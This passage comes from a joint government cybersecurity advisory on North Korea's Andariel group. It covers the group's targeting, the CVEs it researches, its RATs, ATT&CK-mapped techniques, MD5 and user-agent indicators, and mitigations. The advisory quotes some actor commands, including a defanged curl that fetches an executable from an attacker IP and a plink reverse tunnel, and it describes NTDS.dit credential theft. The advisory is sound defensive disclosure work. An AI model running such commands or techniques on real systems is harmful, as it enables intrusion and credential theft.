The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs.

Ransomware

Andariel actors fund their espionage activity through ransomware operations against U.S. healthcare entities, and in some instances, the authoring agencies have observed the actors launching ransomware attacks and conducting cyber espionage operations on the same day and/or leveraging ransomware and cyber espionage against the same entity. For more information on this ransomware activity, see joint advisories #StopRansomware: Ransomware Attacks on Critical Infrastructure Fund DPRK Malicious Cyber Activities and North Korean State-Sponsored Cyber Actors Use Maui Ransomware to Target the Healthcare and Public Health Sector.

Malicious Cyber Espionage Activity

This advisory uses the MITRE ATT&CK for Enterprise framework, version 15. See the Appendix: MITRE ATT&CK Techniques for all referenced tactics and techniques.

Reconnaissance and Enumeration

While there is limited available information on the group’s initial reconnaissance methods, the actors likely identify vulnerable systems using publicly available internet scanning tools that reveal information such as vulnerabilities in public-facing web servers [T1595, T1592]. The actors gather open source information about their victims for use in targeting [T1591] and research Common Vulnerabilities and Exposures (CVEs) when published to the National Institute of Standards and Technology (NIST) National Vulnerability Database [T1596]. CVEs researched include:

• CVE-2023-46604 – Apache ActiveMQ
• CVE-2023-42793 – TeamCity
• CVE-2023-3519 – Citrix NetScaler
• CVE-2023-35078 – Ivanti Endpoint Manager Mobile (EPMM)
• CVE-2023-34362 – MOVEIt
• CVE-2023-33246 – RocketMQ
• CVE-2023-32784 – KeePass
• CVE-2023-32315 – Openfire
• CVE-2023-3079 – Google Chromium V8 Type Confusion
• CVE-2023-28771 and CVE-2023-33010 – Zyxell firmware
• CVE-2023-2868 – Barracuda Email Security Gateway
• CVE-2023-27997 – FortiGate SSL VPN
• CVE-2023-25690 – Apache HTTP Server
• CVE-2023-21932 – Oracle Hospitality Opera 5
• CVE-2023-0669 – GoAnywhere MFT
• CVE-2022-47966 – ManageEngine
• CVE-2022-41352 and CVE-2022-27925 – Zimbra Collaboration Suite
• CVE-2022-30190 – Microsoft Windows Support Diagnostic Tool
• CVE-2022-25064 – TP-LINK 
• CVE-2022-24990 and CVE-2021-45837 – TerraMaster NAS
• CVE-2022-24785 – Moment.js
• CVE-2022-24665, CVE-2022-24664, and CVE-2022-24663 – PHP Everywhere
• CVE-2022-22965 – Spring4Shell
• CVE-2022-22947 – Spring Cloud Gateway
• CVE-2022-22005 – Microsoft SharePoint Server
• CVE-2022-21882 – Win32k Elevation of Privilege
• CVE-2021-44228 – Apache Log4j
• CVE-2021-44142 – Samba vfs_fruit module
• CVE-2021-43226, CEV-2021-43207, CVE-2021-36955 – Windows log file vulnerabilities
• CVE-2021-41773 – Apache HTTP Server 2.4.49
• CVE-2021-40684 – Talend ESB Runtime
• CVE-2021-3018 – IPeakCMS 3.5
• CVE-2021-20038 – SMA100 Apache httpd server (SonicWall)
• CVE-2021-20028 – SonicWall Secure Remote Access (SRA)
• CVE-2019-15637 – Tableau
• CVE-2019-7609 – Kibana
• CVE-2019-0708 – Microsoft Remote Desktop Services
• CVE-2017-4946 – VMware V4H and V4PA

Resource Development, Tooling, and Remote Access Tools

The actors leverage custom tools and malware for discovery and execution. Over the last 15 years, the group has developed RATs, including the following, to permit remote access and manipulation of systems and lateral movement.

• Atharvan
• ELF Backdoor
• Jupiter
• MagicRAT
• “No Pineapple”
• TigerRAT
• Valefor/VSingle
• ValidAlpha
• YamaBot
• NukeSped
• Goat RAT
• Black RAT
• AndarLoader
• DurianBeacon
• Trifaux
• KaosRAT
• Preft
• Andariel Scheduled Task Malware
• BottomLoader (see Cisco Talos blog Operation Blacksmith)
• NineRAT (see Cisco Talos blog Operation Blacksmith)
• DLang (see Cisco Talos blog Operation Blacksmith)
• Nestdoor (see AhnLab blog)

These tools include functionality for executing arbitrary commands, keylogging, screenshots, listing files and directories, browser history retrieval, process snooping, creating and writing to files, capturing network connections, and uploading content to command and control (C2) [T1587.001, T1587.004]. The tools allow the actors to maintain access to the victim system with each implant having a designated C2 node.

Commodity Malware

Commodity malware is malicious software widely available for purchase or use and is leveraged by numerous different threat actors. The use of publicly available malware enables the actors to conceal and obfuscate their identities and leads to attribution problems. The authoring agencies are reliant on the use of custom malware and loaders, along with overlapping C2 nodes to attribute commodity malware to the actors. The actors have at times achieved great success leveraging just open source malware. The authoring agencies have identified the following open-source tools as used and/or customized by the actors:

Initial Access

The actors gain initial access through widespread exploitation of web servers through known vulnerabilities, such as CVE-2021-44228 (“Log4Shell”) in Apache’s Log4j software library and other CVEs listed above, to deploy web shells and gain access to sensitive information and applications for further exploitation. The actors continue to breach organizations by exploiting web server vulnerabilities in public-facing devices and have conducted widespread activity against a number of different organizations simultaneously [T1190].

Execution

The actors are well-versed in using native tools and processes on systems, known as living off the land (LOTL). They use Windows command line, PowerShell, Windows Management Instrumentation command line (WMIC), and Linux bash, for system, network, and account enumeration. While individual commands typically vary, the authoring agencies assess the actors prefer netstat commands, such as netstat –naop and netstat –noa [T1059]. Example commands used by the actors include the following:

• netstat –naop 
• netstat –noa
• pvhost.exe -N -R [IP Address]:[Port] -P [Port] -l [username] -pw [password] <Remote_IP>
• curl hxxp[://][IP Address]/tmp/tmp/comp[.]dat -o c:userspublicnotify[.]exe
• C:windowssystem32cmd.exe /c systeminfo | findstr Logon

These actors often make typos and other mistakes, indicating that the commands are not directly copied from a playbook and the actors have a flexible and impromptu approach. The typos also illustrate a poor grasp of the English language, including common errors such as “Microsoft Cooperation” (rather than “Microsoft Corporation”) found across numerous RGB 3rd Bureau malware samples.

Defense Evasion

The actors routinely pack late-stage tooling in VMProtect and Themida. Malicious tooling packed with these and other commercial tools have advanced anti-debugging and detection capabilities. These files are typically multiple megabytes in size and often contain unusual file section names such as vmp0 and vmp1 for VMProtect and Themida or randomized file section names for Themida [T1027].

Credential Access

The actors employ a multi-pronged approach to stealing credentials to gain additional access to systems, including the use of publicly available credential theft tools such as Mimikatz, ProcDump, and Dumpert and accessing the Active Directory domain database through targeting of the NTDS.dit file. The authoring agencies assess the actors change settings on compromised systems to force the system to store credentials and then use the aforementioned tools to steal credentials. In one instance, the actors used the vssadmin command-line utility to back up a volume to retrieve a copy of the NTDS.dit file containing Active Directory data. In another instance, the actors were observed collecting registry hive data for offline extraction of credentials [T1003].

Discovery

The actors used customized file system enumeration tooling written in .NET. The tool is capable of receiving and executing command line arguments to enumerate directories and files and compress output files. The tool collects the following information for each drive targeted on a system: depth relative to starting path, name, last write time, last access time, creation time, size, and attributes [T1087, T1083].

The actors also enumerate directories and files of connected devices using Server Message Block (SMB) protocol, which enables network file sharing and the ability to request services and programs from a network [T1021.002].

Lateral Movement

The actors also use system logging for discovery to move laterally. The group logs active window changes, clipboard data, and keystrokes and saves the collected logging information to the %Temp% directory.

The actors have also used Remote Desktop Protocol (RDP) to move laterally [T1021].

Command and Control

The actors leverage techniques and infrastructure positioned around the world to send commands to compromised systems. The actors disguise their malware within HTTP packets to appear as benign network traffic. They also use tunneling tools such as 3Proxy, PLINK, and Stunnel as well as custom proxy tunneling tools to tunnel traffic over a variety of protocols from inside a network back to a C2 server. Tunneling enables the actors to perform C2 operations despite network configurations that would typically pose a challenge, such as the use of Network Address Translation (NAT) or traffic funneled through a web proxy [T1090, T1071].

Collection and Exfiltration

Malware previously used by the actors permitted placement and access to search through files that could be of interest, including scanning computer files for keywords related to defense and military sectors in English and Korean. The actors identify data for theft by enumerating files and folders across many directories and servers using command-line activity or functionality built into custom tools. The actors collect the relevant files into RAR archives, sometimes using a version of WinRAR brought into the victim’s environment with other malicious tooling [T1560, T1039].

The actors typically exfiltrate data to web services such as cloud storage or servers not associated with their primary C2. Notably, the actors have been observed logging into actor-controlled cloud-based storage service accounts directly from victim networks to exfiltrate data [T1567]. The actors have also been observed using the utilities PuTTY and WinSCP to exfiltrate data to North Korea-controlled servers via File Transfer Protocol (FTP) and other protocols [T1048].

The actors have also been identified staging files for exfiltration on victim machines, establishing Remote Desktop Protocol connections, and conducting HTTP GET requests on port 80 to receive information [T1021].

Indicators of Compromise

See below for Andariel IOCs.

The following include observed MD5 hashes:

• 88a7c84ac7f7ed310b5ee791ec8bd6c5
• 6ab4eb4c23c9e419fbba85884ea141f4
• 97ce00c7ef1f7d98b48291d73d900181
• 079b4588eaa99a1e802adf5e0b26d8aa
• 0873b5744d8ab6e3fe7c9754cf7761a3
• 0d696d27bae69a62def82e308d28857a
• 0ecf4bac2b070cf40f0b17e18ce312e6
• 17c46ed7b80c2e4dbea6d0e88ea0827c
• 1f2410c3c25dadf9e0943cd634558800
• 2968c20a07cfc97a167aa3dd54124cda
• 33e85d0f3ef2020cdb0fc3c8d80e8e69
• 4118d9adce7350c3eedeb056a3335346
• 4aa57e1c66c2e01f2da3f106ed2303fa
• 58ad3103295afcc22bde8d81e77c282f
• 5c41cbf8a7620e10f158f6b70963d1cb
• 61a949553d35f31957db6442f36730c5
• 72a22afde3f820422cfdbba7a4cbabde
• 84bd45e223b018e67e4662c057f2c47e
• 86465d92f0d690b62866f52f5283b9fc
• 8b395cc6ecdec0900facf6e93ec48fbb
• 97f352e2808c78eef9b31c758ca13032
• a50f3b7aa11b977ae89285b60968aa67
• afd25ce56b9808c5ed7eade75d2e12a7
• afdeb24975a318fc5f20d9e61422a308
• b697b81b341692a0b137b2c748310ea7
• bcac28919fa33704a01d7a9e5e3ddf3f
• c027d641c4c1e9d9ad048cda2af85db6
• c892c60817e6399f939987bd2bf5dee0
• cdeae978f3293f4e783761bc61b34810
• d0f310c99476f1712ac082f78dd29fdc
• d8da33fae924b991b776797ba8cde24c
• e230c5728f9ea5a94e390e7da7bf1ffa
• f4d46629ca15313b94992f3798718df7
• fb84a392601fc19aeb7f8ce11b3a4907
• ff3194d3d5810a42858f3e22c91500b1
• 13b4ce1fc26d400d34ede460a8530d93
• 41895c5416fdc82f7e0babc6bb6c7216
• c2f8c9bb7df688d0a7030a96314bb493
• 33a3da2de78418b89a603e28a1e8852c
• 4896da30a745079cd6265b6332886d45
• 73eb2f4f101aab6158c615094f7a632a
• 7f33d2d2a2ce9c195202acb59de31eee
• e1afd01400ef405e46091e8ef10c721c
• fe25c192875ec1914b8880ea3896cda2
• 232586f8cfe82b80fd0dfa6ed8795c56
• c1f266f7ec886278f030e7d7cd4e9131
• 49bb2ad67a8c5dfbfe8db2169e6fa46e
• beb199b15bd075996fa8d6a0ed554ca8
• 4053ca3e37ed1f8d37b29eed61c2e729
• 3a0c8ae783116c1840740417c4fbe678
• 0414a2ab718d44bf6f7103cff287b312
• ca564428a29faf1a613f35d9fa36313f
• ad6d4eb34d29e350f96dc8df6d8a092e
• dc70dc9845aa747001ebf2a02467c203
• 3d2ec58f37c8176e0dbcc47ff93e5a76
• 0a09b7f2317b3d5f057180be6b6d0755
• 1ffccc23fef2964e9b1747098c19d956
• 9112efb49cae021abebd3e9a564e6ca4
• ac0ada011f1544aa3a1cf27a26f2e288
• 0211a3160cc5871cbcd4e5514449162b
• 7416ea48102e2715c87edd49ddbd1526
• a2aefb7ab6c644aa8eeb482e27b2dbc4
• e7fd7f48fbf5635a04e302af50dfb651
• 33b2b5b7c830c34c688cf6ced287e5be
• e5410abaaac69c88db84ab3d0e9485ac
• eb35b75369805e7a6371577b1d2c4531
• 5a3f3f75048b9cec177838fb8b40b945
• 9d7bd0caed10cc002670faff7ca130f5
• 8434cdd34425916be234b19f933ad7ea
• bbaee4fe73ccff1097d635422fdc0483
• 79e474e056b4798e0a3e7c60dd67fd28
• 95c276215dcc1bd7606c0cb2be06bf70
• 426bb55531e8e3055c942a1a035e46b9
• cfae52529468034dbbb40c9a985fa504
• deae4be61c90ad6d499f5bdac5dad242
• bda0686d02a8b7685adf937cbcd35f46
• 6de6c27ca8f4e00f0b3e8ff5185a59d1
• c61a8c4f6f6870c7ca0013e084b893d2
• 5291aed100cc48415636c4875592f70c
• f4795f7aec4389c8323f7f40b50ae46f
• cf1a90e458966bcba8286d46d6ab052c
• 792370eb01e16ac3dc511143932d0e1d
• 612538328e0c4f3e445fb58ef811336a
• 9767aa592ec2d6ae3c7d40b6049d0466
• b22fd0604c4f189f2b7a59c8f48882dd
• e53ca714787a86c13f07942a56d64efa
• c7b09f1dd0a5694de677f3ecceda41b7
• c8346b39418f92725719f364068a218d
• 730bff14e80ffd7737a97cdf11362ab5
• 9a481bc83fea1dea3e3bdfff5e154d44
• ddb1f970371fa32faae61fc5b8423d4b
• 6c2b947921e7c77d9af62ce9a3ed7621
• 977d30b261f64cc582b48960909d0a89
• 7ce51b56a6b0f8f78056ddfc5b5de67c
• dd9625be4a1201c6dfb205c12cf3a381
• ecb4a09618e2aba77ea37bd011d7d7f7
• 0fd8c6f56c52c21c061a94e5765b27b4
• c90d094a8fbeaa8a0083c7372bfc1897
• 0055a266aa536b2fdadb3336ef8d4fba
• 55bb271bbbf19108fec73d224c9b4218
• 0c046a2f5304ed8d768795a49b99d6e4
• f34664e0d9a10974da117c1ca859dba8
• a2c2099d503fcc29478205f5aef0283b
• e439f850aa8ead560c99a8d93e472225
• 7c30ed6a612a1fd252565300c03c7523
• 81738405a7783c09906da5c7212e606b
• c027d641c4c1e9d9ad048cda2af85db6
• eb7ba9f7424dffdb7d695b00007a3c6d
• 3e9ee5982e3054dc76d3ba5cc88ae3de
• 073e3170a8e7537ff985ec8316319351
• 9b0e7c460a80f740d455a7521f0eada1
• 2d02f5499d35a8dffb4c8bc0b7fec5c2
• 0984954526232f7d05910aa5b07c5893
• 4156a7283284ece739e1bae05f99e17c
• 3026d419ee140f3c6acd5bff54132795
• 7aa132c0cc63a38fb4d1789553266fc7
• 1a0811472fad0ff507a92c957542fffd
• f8aef59d0c5afe8df31e11a1984fbc0a
• 82491b42b9a2d34b13137e36784a67d7
• 0a199944f757d5615164e8808a3c712a
• 9c97ea18da290a6833a1d36e2d419efc
• 16f768eac33f79775a9672018e0d64f5

The following include a list of user agent strings used by the actors:

• Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
• Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
• Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
• Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
• Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
• Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
• Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
• Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
• Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
• Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
• Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
• Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0

Detection Methods

See Table 2 for YARA rules, created by the FBI, authoring partners, and private industry, that can be used to detect malware used by the actors.

Mitigation Measures

The authoring agencies recommend implementing the mitigations below to improve your organization’s cybersecurity posture based on the threat actors’ activity.

Log4Shell and Other Log4j Vulnerabilities

Defenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed by the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and upgrading Log4j assets and affected products to the latest version.

Note: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to version 2.17.0.

Defenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to detect possible Log4Shell exploitation.

Web Shell Malware

Web shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands. The NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides mitigating actions to identify and recover from web shells.

Preventing exploitation of web-facing servers often depends on maintaining an inventory of systems and applications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind reverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs).

Endpoint Activity

Preventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring mechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and services or turning them off entirely, and segmenting the network to prevent lateral movement from a compromised web server to critical assets.

Command Line Activity and Remote Access

Monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets can protect against malicious activity by RGB 3rd Bureau’s Andariel group and other cyber threat actors.

Packing

Signatures for Themida, VMProtect and a number of other packers are available here, however, the signatures will not identify every file packed using these applications.

• Check for security vulnerabilities, apply patches, and update to the latest version of software
• Encrypt all sensitive data including personal information
• Block access to unused ports
• Change passwords when they are suspected of being compromised
• Strengthen the subscriber identity authentication process for leased servers

DPRK Rewards for Justice

The U.S. and ROK Governments encourage victims to report suspicious activities, including those related to suspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities in cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information about illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information through the Department of State’s Rewards for Justice program could make you eligible to receive an award of up to $10 million. For further details, please visit https://rewardsforjustice.net/.

Acknowledgements

Mandiant and Microsoft Threat Intelligence contributed to this CSA.

Disclaimer of Endorsement

Your organization has no obligation to respond or provide information in response to this product.  If, after reviewing the information provided, your organization decides to provide information to the authorizing agencies, it must do so consistent with applicable state and federal law.

The information in this report is being provided “as is” for informational purposes only. The authoring agencies do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by the co-authors.

Trademark Recognition

Active Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft Corporation. MITRE® and ATT&CK® are registered trademarks of The MITRE Corporation.

Purpose

This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.

Contact

U.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical information associated with this Cybersecurity Advisory, to CISA at Report@cisa.dhs.gov or cisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.

DC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil

DoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment (DCISE): dc3.dcise@us.af.mil

NSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov

NSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov

NSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov

Republic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or discover similar cases, please contact the relevant authorities below.

National Intelligence Service: www.nis.go.kr, +82 111

References

AhnLab Security Emergency Response Center:

Boredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html

Cisco Talos Intelligence blogs:

DCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-dbfe29f57499

Github.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar

JPCERT blogs:

Mandiant blogs:

Microsoft blogs:

NSCS Guidance:

Symantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research

VMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html

WithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector

Appendix: MITRE ATT&CK Techniques and Software

The tactics and techniques referenced in this advisory are identified in Table 3 – Table 12.